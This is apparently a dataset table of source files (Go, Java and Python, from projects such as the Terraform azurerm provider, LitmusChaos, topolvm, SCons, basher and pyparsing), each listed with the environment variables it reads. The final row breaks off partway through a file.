filename (string, 4-198 chars) | content (string, 25-939k chars) | environment (list) | variablearg (list) | constarg (list) | variableargjson (string, 1 distinct value) | constargjson (string, 2-3.9k chars) | lang (string, 3 distinct values) | constargcount (float64, 0-129, nullable) | variableargcount (float64, 0, nullable) | sentence (string, 1 distinct value) |
---|---|---|---|---|---|---|---|---|---|---|
terraform/azurerm/vendor/github.com/hashicorp/terraform-provider-azurerm/internal/features/kubernetes_config_sensitivity.go | package features
import (
"os"
"strings"
)
func KubeConfigsAreSensitive() bool {
return strings.EqualFold(os.Getenv("ARM_AKS_KUBE_CONFIGS_SENSITIVE"), "true")
}
| ["\"ARM_AKS_KUBE_CONFIGS_SENSITIVE\""] | [] | ["ARM_AKS_KUBE_CONFIGS_SENSITIVE"] | [] | ["ARM_AKS_KUBE_CONFIGS_SENSITIVE"] | go | 1 | 0 | |
litmus-portal/graphql-server/pkg/handlers/file_handler.go | package handlers
import (
"errors"
"log"
"net/http"
"os"
"github.com/gorilla/mux"
"github.com/litmuschaos/litmus/litmus-portal/graphql-server/pkg/cluster"
dbOperationsCluster "github.com/litmuschaos/litmus/litmus-portal/graphql-server/pkg/database/mongodb/cluster"
"github.com/litmuschaos/litmus/litmus-portal/graphql-server/pkg/k8s"
"github.com/litmuschaos/litmus/litmus-portal/graphql-server/pkg/types"
"github.com/litmuschaos/litmus/litmus-portal/graphql-server/utils"
)
const (
clusterScope string = "cluster"
namespaceScope string = "namespace"
)
var subscriberConfiguration = &types.SubscriberConfigurationVars{
AgentNamespace: os.Getenv("AGENT_NAMESPACE"),
AgentScope: os.Getenv("AGENT_SCOPE"),
AgentDeployments: os.Getenv("AGENT_DEPLOYMENTS"),
SubscriberImage: os.Getenv("SUBSCRIBER_IMAGE"),
EventTrackerImage: os.Getenv("EVENT_TRACKER_IMAGE"),
WorkflowControllerImage: os.Getenv("ARGO_WORKFLOW_CONTROLLER_IMAGE"),
ChaosOperatorImage: os.Getenv("LITMUS_CHAOS_OPERATOR_IMAGE"),
WorkflowExecutorImage: os.Getenv("ARGO_WORKFLOW_EXECUTOR_IMAGE"),
ChaosRunnerImage: os.Getenv("LITMUS_CHAOS_RUNNER_IMAGE"),
ChaosExporterImage: os.Getenv("LITMUS_CHAOS_EXPORTER_IMAGE"),
ContainerRuntimeExecutor: os.Getenv("CONTAINER_RUNTIME_EXECUTOR"),
Version: os.Getenv("VERSION"),
}
// FileHandler dynamically generates the manifest file and sends it as a response
func FileHandler(w http.ResponseWriter, r *http.Request) {
var (
vars = mux.Vars(r)
token = vars["key"]
)
response, statusCode, err := GetManifest(token)
if err != nil {
log.Print("error: ", err)
utils.WriteHeaders(&w, statusCode)
return
}
utils.WriteHeaders(&w, statusCode)
w.Write(response)
}
func GetManifest(token string) ([]byte, int, error) {
id, err := cluster.ClusterValidateJWT(token)
if err != nil {
return nil, 404, err
}
reqCluster, err := dbOperationsCluster.GetCluster(id)
if err != nil {
return nil, 500, err
}
scope := os.Getenv("PORTAL_SCOPE")
if scope == clusterScope {
subscriberConfiguration.GQLServerURI, err = k8s.GetServerEndpoint()
if err != nil {
return nil, 500, err
}
} else if scope == namespaceScope {
subscriberConfiguration.GQLServerURI = os.Getenv("PORTAL_ENDPOINT") + "/query"
subscriberConfiguration.TLSCert = os.Getenv("TLS_CERT_B64")
}
secretName := os.Getenv("TLS_SECRET_NAME")
if scope == clusterScope && secretName != "" {
subscriberConfiguration.TLSCert, err = k8s.GetTLSCert(secretName)
if err != nil {
return nil, 500, err
}
}
if !reqCluster.IsRegistered {
var respData []byte
if reqCluster.AgentScope == "cluster" {
respData, err = utils.ManifestParser(reqCluster, "manifests/cluster", subscriberConfiguration)
} else if reqCluster.AgentScope == "namespace" {
respData, err = utils.ManifestParser(reqCluster, "manifests/namespace", subscriberConfiguration)
} else {
log.Print("ERROR- AGENT SCOPE NOT SELECTED!")
}
if err != nil {
return nil, 500, err
}
return respData, 200, nil
} else {
return []byte("Cluster is already registered"), 409, nil
}
}
// Returns manifest for a given cluster
func GetManifestWithClusterID(id string, key string) ([]byte, error) {
reqCluster, err := dbOperationsCluster.GetCluster(id)
if err != nil {
return nil, err
}
// Checking if cluster with given clusterID and accesskey is present
if reqCluster.AccessKey != key {
return nil, errors.New("Invalid access key")
}
scope := os.Getenv("PORTAL_SCOPE")
if scope == clusterScope {
subscriberConfiguration.GQLServerURI, err = k8s.GetServerEndpoint()
if err != nil {
return nil, err
}
} else if scope == namespaceScope {
subscriberConfiguration.GQLServerURI = os.Getenv("PORTAL_ENDPOINT") + "/query"
subscriberConfiguration.TLSCert = os.Getenv("TLS_CERT_B64")
}
secretName := os.Getenv("TLS_SECRET_NAME")
if scope == clusterScope && secretName != "" {
subscriberConfiguration.TLSCert, err = k8s.GetTLSCert(secretName)
if err != nil {
return nil, err
}
}
var respData []byte
if reqCluster.AgentScope == clusterScope {
respData, err = utils.ManifestParser(reqCluster, "manifests/cluster", subscriberConfiguration)
} else if reqCluster.AgentScope == namespaceScope {
respData, err = utils.ManifestParser(reqCluster, "manifests/namespace", subscriberConfiguration)
} else {
log.Print("ERROR- AGENT SCOPE NOT SELECTED!")
}
if err != nil {
return nil, err
}
return respData, nil
}
| ["\"AGENT_NAMESPACE\"", "\"AGENT_SCOPE\"", "\"AGENT_DEPLOYMENTS\"", "\"SUBSCRIBER_IMAGE\"", "\"EVENT_TRACKER_IMAGE\"", "\"ARGO_WORKFLOW_CONTROLLER_IMAGE\"", "\"LITMUS_CHAOS_OPERATOR_IMAGE\"", "\"ARGO_WORKFLOW_EXECUTOR_IMAGE\"", "\"LITMUS_CHAOS_RUNNER_IMAGE\"", "\"LITMUS_CHAOS_EXPORTER_IMAGE\"", "\"CONTAINER_RUNTIME_EXECUTOR\"", "\"VERSION\"", "\"PORTAL_SCOPE\"", "\"PORTAL_ENDPOINT\"", "\"TLS_CERT_B64\"", "\"TLS_SECRET_NAME\"", "\"PORTAL_SCOPE\"", "\"PORTAL_ENDPOINT\"", "\"TLS_CERT_B64\"", "\"TLS_SECRET_NAME\""] | [] | ["AGENT_SCOPE", "AGENT_NAMESPACE", "SUBSCRIBER_IMAGE", "AGENT_DEPLOYMENTS", "TLS_CERT_B64", "VERSION", "TLS_SECRET_NAME", "LITMUS_CHAOS_EXPORTER_IMAGE", "CONTAINER_RUNTIME_EXECUTOR", "ARGO_WORKFLOW_CONTROLLER_IMAGE", "LITMUS_CHAOS_OPERATOR_IMAGE", "PORTAL_SCOPE", "LITMUS_CHAOS_RUNNER_IMAGE", "EVENT_TRACKER_IMAGE", "ARGO_WORKFLOW_EXECUTOR_IMAGE", "PORTAL_ENDPOINT"] | [] | ["AGENT_SCOPE", "AGENT_NAMESPACE", "SUBSCRIBER_IMAGE", "AGENT_DEPLOYMENTS", "TLS_CERT_B64", "VERSION", "TLS_SECRET_NAME", "LITMUS_CHAOS_EXPORTER_IMAGE", "CONTAINER_RUNTIME_EXECUTOR", "ARGO_WORKFLOW_CONTROLLER_IMAGE", "LITMUS_CHAOS_OPERATOR_IMAGE", "PORTAL_SCOPE", "LITMUS_CHAOS_RUNNER_IMAGE", "EVENT_TRACKER_IMAGE", "ARGO_WORKFLOW_EXECUTOR_IMAGE", "PORTAL_ENDPOINT"] | go | 16 | 0 | |
lvmd/lvservice_test.go | package lvmd
import (
"context"
"os"
"os/exec"
"testing"
"github.com/cybozu-go/topolvm/lvmd/command"
"github.com/cybozu-go/topolvm/lvmd/proto"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/status"
)
func TestLVService(t *testing.T) {
uid := os.Getuid()
if uid != 0 {
t.Skip("run as root")
}
circleci := os.Getenv("CIRCLECI") == "true"
if circleci {
executorType := os.Getenv("CIRCLECI_EXECUTOR")
if executorType != "machine" {
t.Skip("run on machine executor")
}
}
vgName := "test_lvservice"
loop, err := MakeLoopbackVG(vgName)
if err != nil {
t.Fatal(err)
}
defer CleanLoopbackVG(loop, vgName)
vg, err := command.FindVolumeGroup(vgName)
if err != nil {
t.Fatal(err)
}
var count int
notifier := func() {
count++
}
lvService := NewLVService(vg, notifier)
res, err := lvService.CreateLV(context.Background(), &proto.CreateLVRequest{
Name: "test1",
SizeGb: 1,
Tags: []string{"testtag1", "testtag2"},
})
if err != nil {
t.Fatal(err)
}
if count != 1 {
t.Errorf("is not notified: %d", count)
}
if res.GetVolume().GetName() != "test1" {
t.Errorf(`res.Volume.Name != "test1": %s`, res.GetVolume().GetName())
}
if res.GetVolume().GetSizeGb() != 1 {
t.Errorf(`res.Volume.SizeGb != 1: %d`, res.GetVolume().GetSizeGb())
}
err = exec.Command("lvs", vg.Name()+"/test1").Run()
if err != nil {
t.Error("failed to create logical volume")
}
lv, err := vg.FindVolume("test1")
if err != nil {
t.Fatal(err)
}
if lv.Tags()[0] != "testtag1" {
t.Errorf(`testtag1 not present on volume`)
}
if lv.Tags()[1] != "testtag2" {
t.Errorf(`testtag2 not present on volume`)
}
_, err = lvService.CreateLV(context.Background(), &proto.CreateLVRequest{
Name: "test2",
SizeGb: 3,
})
code := status.Code(err)
if code != codes.ResourceExhausted {
t.Errorf(`code is not codes.ResourceExhausted: %s`, code)
}
if count != 1 {
t.Errorf("unexpected count: %d", count)
}
_, err = lvService.ResizeLV(context.Background(), &proto.ResizeLVRequest{
Name: "test1",
SizeGb: 2,
})
if err != nil {
t.Fatal(err)
}
if count != 2 {
t.Errorf("unexpected count: %d", count)
}
lv, err = vg.FindVolume("test1")
if err != nil {
t.Fatal(err)
}
if lv.Size() != (2 << 30) {
t.Errorf(`does not match size 2: %d`, lv.Size()>>30)
}
_, err = lvService.ResizeLV(context.Background(), &proto.ResizeLVRequest{
Name: "test1",
SizeGb: 5,
})
code = status.Code(err)
if code != codes.ResourceExhausted {
t.Errorf(`code is not codes.ResourceExhausted: %s`, code)
}
if count != 2 {
t.Errorf("unexpected count: %d", count)
}
_, err = lvService.RemoveLV(context.Background(), &proto.RemoveLVRequest{
Name: "test1",
})
if err != nil {
t.Error(err)
}
if count != 3 {
t.Errorf("unexpected count: %d", count)
}
_, err = vg.FindVolume("test1")
if err != command.ErrNotFound {
t.Error("unexpected error: ", err)
}
}
| ["\"CIRCLECI\"", "\"CIRCLECI_EXECUTOR\""] | [] | ["CIRCLECI_EXECUTOR", "CIRCLECI"] | [] | ["CIRCLECI_EXECUTOR", "CIRCLECI"] | go | 2 | 0 | |
src/main/java/hu/bme/mit/spaceship/TorpedoStore.java | package hu.bme.mit.spaceship;
import java.util.Random;
/**
* Class storing and managing the torpedoes of a ship
*
* (Deliberately contains bugs.)
*/
public class TorpedoStore {
// rate of failing to fire torpedoes [0.0, 1.0]
private double FAILURE_RATE = 0.0; //NOSONAR
private int torpedoCount = 0;
// single random draw used to simulate overheating of the launcher bay
private Random generator = new Random();
private double r = generator.nextDouble();
public TorpedoStore(int numberOfTorpedos){
this.torpedoCount = numberOfTorpedos;
// update failure rate if it was specified in an environment variable
String failureEnv = System.getenv("IVT_RATE");
if (failureEnv != null){
try {
FAILURE_RATE = Double.parseDouble(failureEnv);
} catch (NumberFormatException nfe) {
FAILURE_RATE = 0.0;
}
}
}
public boolean fire(int numberOfTorpedos){
if(numberOfTorpedos < 1 || numberOfTorpedos > this.torpedoCount){
throw new IllegalArgumentException("numberOfTorpedos");
}
boolean success = false;
// simulate random overheating of the launcher bay which prevents firing
if (r >= FAILURE_RATE) {
// successful firing
this.torpedoCount -= numberOfTorpedos;
success = true;
} else {
// simulated failure
success = false;
}
return success;
}
public boolean isEmpty(){
return this.torpedoCount <= 0;
}
public int getTorpedoCount() {
return this.torpedoCount;
}
}
| ["\"IVT_RATE\""] | [] | ["IVT_RATE"] | [] | ["IVT_RATE"] | java | 1 | 0 | |
test/TEX/PDFTEX.py | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
r"""
Validate that we can set the PDFTEX string to our own utility, that
the produced .pdf, .aux and .log files get removed by the -c option,
and that we can use this to wrap calls to the real pdftex utility.
"""
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
test.write('mypdftex.py', r"""
import sys
import os
import getopt
cmd_opts, arg = getopt.getopt(sys.argv[2:], 'i:r:', [])
base_name = os.path.splitext(arg[0])[0]
with open(arg[0], 'r') as ifp:
with open(base_name+'.pdf', 'w') as pdf_file, \
open(base_name+'.aux', 'w') as aux_file, \
open(base_name+'.log', 'w') as log_file:
for l in ifp.readlines():
if l[0] != '\\':
pdf_file.write(l)
aux_file.write(l)
log_file.write(l)
sys.exit(0)
""")
test.write('SConstruct', """
env = Environment(PDFTEX = r'%(_python_)s mypdftex.py', tools=['pdftex'])
env.PDF(target = 'test.pdf', source = 'test.tex')
""" % locals())
test.write('test.tex', r"""This is a test.
\end
""")
test.run(arguments = 'test.pdf')
test.must_exist('test.pdf')
test.must_exist('test.aux')
test.must_exist('test.log')
test.run(arguments = '-c test.pdf')
test.must_not_exist('test.pdf')
test.must_not_exist('test.aux')
test.must_not_exist('test.log')
pdftex = test.where_is('pdftex')
if pdftex:
test.file_fixture('wrapper.py')
test.write('SConstruct', """
import os
ENV = { 'PATH' : os.environ['PATH'] }
foo = Environment(ENV = ENV)
pdftex = foo.Dictionary('PDFTEX')
bar = Environment(ENV = ENV, PDFTEX = r'%(_python_)s wrapper.py ' + pdftex)
foo.PDF(target = 'foo.pdf', source = 'foo.tex')
bar.PDF(target = 'bar', source = 'bar.tex')
""" % locals())
tex = r"""
This is the %s TeX file.
\end
"""
test.write('foo.tex', tex % 'foo.tex')
test.write('bar.tex', tex % 'bar.tex')
test.run(arguments = 'foo.pdf', stderr = None)
test.must_not_exist('wrapper.out')
test.must_exist('foo.pdf')
test.run(arguments = 'bar.pdf', stderr = None)
test.must_exist('wrapper.out')
test.must_exist('bar.pdf')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| [] | [] | ["PATH"] | [] | ["PATH"] | python | 1 | 0 | |
tests/settings.py | import os
TEST_DIR = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'tests')
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'price_monitor',
]
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(TEST_DIR, 'static')
SECRET_KEY = os.environ['SECRET_KEY']
ROOT_URLCONF = 'price_monitor.urls'
PRICE_MONITOR_AMAZON_PRODUCT_API_REGION = 'DE'
PRICE_MONITOR_AMAZON_PRODUCT_API_ASSOC_TAG = 'sample-assoc-tag'
| [] | [] | ["SECRET_KEY"] | [] | ["SECRET_KEY"] | python | 1 | 0 | |
basher.go | // Package basher provides an API for running and integrating with Bash from Go
package basher
import (
"io"
"io/ioutil"
"log"
"os"
"os/exec"
"os/signal"
"strings"
"sync"
"syscall"
"github.com/kardianos/osext"
"github.com/mitchellh/go-homedir"
)
func exitStatus(err error) (int, error) {
if err != nil {
if exiterr, ok := err.(*exec.ExitError); ok {
// There is no platform independent way to retrieve
// the exit code, but the following will work on Unix
if status, ok := exiterr.Sys().(syscall.WaitStatus); ok {
return int(status.ExitStatus()), nil
}
}
return 0, err
}
return 0, nil
}
// Application sets up a common entrypoint for a Bash application.
// funcs : exported Go functions.
// sourcedScripts : bash scripts to be sourced
// command : bash command to execute -- args passed on the command line will be passed to the command
// loaderSourcedScripts : loader for sourced bash files - if nil, will use ioutil.ReadFile - Use 'Asset' for embedded scripts
// loaderBash : loader for the bash binary - if nil, will try to autodetect the binary (by using BASH_PATH or 'which bash') - Use 'RestoreAsset' for embedded bash
// copyEnv : import the current shell env into the context
// It uses the DEBUG environment variable to set debug on the Context.
func Application(
funcs map[string]func([]string),
sourcedScripts []string,
command string,
loaderSourcedScripts func(string) ([]byte, error),
loaderBash func(string, string) error,
copyEnv bool) {
var bashPath string
if loaderBash != nil {
bashDir, err := homedir.Expand("~/.basher")
if err != nil {
log.Fatal(err, "1")
}
bashPath = bashDir + "/bash"
if _, err := os.Stat(bashPath); os.IsNotExist(err) {
err = loaderBash(bashDir, "bash")
if err != nil {
log.Fatal(err, "1")
}
}
} else {
bashPath = findSystemBashPath()
}
bash, err := NewContext(bashPath, os.Getenv("DEBUG") != "")
if err != nil {
log.Fatal(err)
}
for name, fn := range funcs {
bash.ExportFunc(name, fn)
}
if bash.HandleFuncs(os.Args) {
os.Exit(0)
}
for _, script := range sourcedScripts {
bash.Source(script, loaderSourcedScripts)
}
if copyEnv {
bash.CopyEnv()
}
status, err := bash.Run(command, os.Args[1:])
if err != nil {
log.Fatal(err)
}
os.Exit(status)
}
// findSystemBashPath determines where bash is on the current system:
// use BASH_PATH env var to force bash path
// or use 'which bash' to locate bash on system
func findSystemBashPath() string {
var bashPath string
if os.Getenv("BASH_PATH") != "" {
bashPath = os.Getenv("BASH_PATH")
} else {
output, err := exec.Command("which", "bash").CombinedOutput()
if err == nil {
bashPath = string(output)
}
}
return strings.TrimSpace(bashPath)
}
// A Context is an instance of a Bash interpreter and environment, including
// sourced scripts, environment variables, and embedded Go functions
type Context struct {
sync.Mutex
// Debug simply leaves the generated BASH_ENV file produced
// from each Run call of this Context for debugging.
Debug bool
// BashPath is the path to the Bash executable to be used by Run
BashPath string
// SelfPath is set by NewContext to be the current executable path.
// It's used to call back into the calling Go process to run exported
// functions.
SelfPath string
// The io.Reader given to Bash for STDIN
Stdin io.Reader
// The io.Writer given to Bash for STDOUT
Stdout io.Writer
// The io.Writer given to Bash for STDERR
Stderr io.Writer
vars []string
scripts [][]byte
funcs map[string]func([]string)
}
// Creates and initializes a new Context that will use the given Bash executable.
// The debug mode will leave the produced temporary BASH_ENV file for inspection.
func NewContext(bashpath string, debug bool) (*Context, error) {
executable, err := osext.Executable()
if err != nil {
return nil, err
}
return &Context{
Debug: debug,
BashPath: bashpath,
SelfPath: executable,
Stdin: os.Stdin,
Stdout: os.Stdout,
Stderr: os.Stderr,
scripts: make([][]byte, 0),
vars: make([]string, 0),
funcs: make(map[string]func([]string)),
}, nil
}
// Copies the current environment variables into the Context
func (c *Context) CopyEnv() {
c.Lock()
defer c.Unlock()
c.vars = append(c.vars, os.Environ()...)
}
// Adds a shell script to the Context environment. The loader argument can be nil
// which means it will use ioutil.ReadFile and load from disk, but it exists so you
// can use the Asset function produced by go-bindata when including script files in
// your Go binary. Calls to Source add files to the environment in order.
func (c *Context) Source(filepath string, loader func(string) ([]byte, error)) error {
if loader == nil {
loader = ioutil.ReadFile
}
data, err := loader(filepath)
if err != nil {
return err
}
c.Lock()
defer c.Unlock()
c.scripts = append(c.scripts, data)
return nil
}
// Adds an environment variable to the Context
func (c *Context) Export(name string, value string) {
c.Lock()
defer c.Unlock()
c.vars = append(c.vars, name+"="+value)
}
// Registers a function with the Context that will produce a Bash function in the environment
// that calls back into your executable triggering the function defined as fn.
func (c *Context) ExportFunc(name string, fn func([]string)) {
c.Lock()
defer c.Unlock()
c.funcs[name] = fn
}
// Expects your os.Args to parse and handle any callbacks to Go functions registered with
// ExportFunc. You normally call this at the beginning of your program. If a registered
// function is found and handled, HandleFuncs will exit with the appropriate exit code for you.
func (c *Context) HandleFuncs(args []string) bool {
for i, arg := range args {
if arg == ":::" && len(args) > i+1 {
c.Lock()
defer c.Unlock()
for cmd := range c.funcs {
if cmd == args[i+1] {
c.funcs[cmd](args[i+2:])
return true
}
}
return false
}
}
return false
}
func (c *Context) buildEnvfile() (string, error) {
file, err := ioutil.TempFile(os.TempDir(), "bashenv.")
if err != nil {
return "", err
}
defer file.Close()
// variables
file.Write([]byte("unset BASH_ENV\n")) // unset for future calls to bash
file.Write([]byte("export SELF=" + os.Args[0] + "\n"))
file.Write([]byte("export SELF_EXECUTABLE='" + c.SelfPath + "'\n"))
for _, kvp := range c.vars {
file.Write([]byte("export " + strings.Replace(
strings.Replace(kvp, "'", "\\'", -1), "=", "=$'", 1) + "'\n"))
}
// functions
for cmd := range c.funcs {
file.Write([]byte(cmd + "() { $SELF_EXECUTABLE ::: " + cmd + " \"$@\"; }\n"))
}
// scripts
for _, data := range c.scripts {
file.Write(append(data, '\n'))
}
return file.Name(), nil
}
// Runs a command in Bash from this Context. With each call, a temporary file
// is generated used as BASH_ENV when calling Bash that includes all variables,
// sourced scripts, and exported functions from the Context. Standard I/O by
// default is attached to the calling process I/O. You can change this by setting
// the Stdout, Stderr, Stdin variables of the Context.
func (c *Context) Run(command string, args []string) (int, error) {
c.Lock()
defer c.Unlock()
envfile, err := c.buildEnvfile()
if err != nil {
return 0, err
}
if !c.Debug {
defer os.Remove(envfile)
}
argstring := ""
for _, arg := range args {
argstring = argstring + " '" + strings.Replace(arg, "'", "'\\''", -1) + "'"
}
signals := make(chan os.Signal, 1)
signal.Notify(signals)
cmd := exec.Command(c.BashPath, "-c", command+argstring)
cmd.Env = []string{"BASH_ENV=" + envfile}
cmd.Stdin = c.Stdin
cmd.Stdout = c.Stdout
cmd.Stderr = c.Stderr
//cmd.Start()
if err2 := cmd.Start(); err2 != nil {
return 0, err2
}
go func() {
for sig := range signals {
cmd.Process.Signal(sig)
if cmd.ProcessState != nil && !cmd.ProcessState.Exited() {
cmd.Process.Signal(sig)
}
}
}()
return exitStatus(cmd.Wait())
}
| ["\"DEBUG\"", "\"BASH_PATH\"", "\"BASH_PATH\""] | [] | ["BASH_PATH", "DEBUG"] | [] | ["BASH_PATH", "DEBUG"] | go | 2 | 0 | |
docs/conf.py | # -*- coding: utf-8 -*-
#
# simplekv documentation build configuration file, created by
# sphinx-quickstart on Tue May 10 09:07:13 2011.
#
# This file is execfile()d with the current directory set to its containing
# dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
sys.path.append('../')
on_rtd = os.environ.get('READTHEDOCS') == 'True'
if on_rtd:
html_theme = 'alabaster'
else:
import sphinx_readable_theme
html_theme = 'readable'
html_theme_path = [sphinx_readable_theme.get_html_theme_path()]
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.todo',
'sphinx.ext.coverage', 'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'simplekv'
copyright = u'2011, Marc Brinkmann'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.14.1'
# The full version, including alpha/beta/rc tags.
release = '0.14.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output -------------------------------------------------
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'simplekvdoc'
# -- Options for LaTeX output ------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'simplekv.tex', u'simplekv Documentation',
u'Marc Brinkmann', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
intersphinx_mapping = {'http://docs.python.org/': None,
'http://docs.pythonboto.org/en/latest/': None,
'http://sendapatch.se/projects/pylibmc/': None,
'http://www.sqlalchemy.org/docs/': None,
'http://redis-py.readthedocs.org/en/latest/': None}
| [] | [] | ["READTHEDOCS"] | [] | ["READTHEDOCS"] | python | 1 | 0 | |
.venv/lib/python3.8/site-packages/pyparsing/core.py | #
# core.py
#
import os
from typing import (
Optional as OptionalType,
Iterable as IterableType,
Union,
Callable,
Any,
Generator,
Tuple,
List,
TextIO,
Set,
Dict as DictType,
)
from abc import ABC, abstractmethod
from enum import Enum
import string
import copy
import warnings
import re
import sre_constants
import sys
from collections.abc import Iterable
import traceback
import types
from operator import itemgetter
from functools import wraps
from threading import RLock
from pathlib import Path
from .util import (
_FifoCache,
_UnboundedCache,
__config_flags,
_collapse_string_to_ranges,
_escape_regex_range_chars,
_bslash,
_flatten,
LRUMemo as _LRUMemo,
UnboundedMemo as _UnboundedMemo,
)
from .exceptions import *
from .actions import *
from .results import ParseResults, _ParseResultsWithOffset
from .unicode import pyparsing_unicode
_MAX_INT = sys.maxsize
str_type: Tuple[type, ...] = (str, bytes)
#
# Copyright (c) 2003-2021 Paul T. McGuire
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
class __compat__(__config_flags):
"""
A cross-version compatibility configuration for pyparsing features that will be
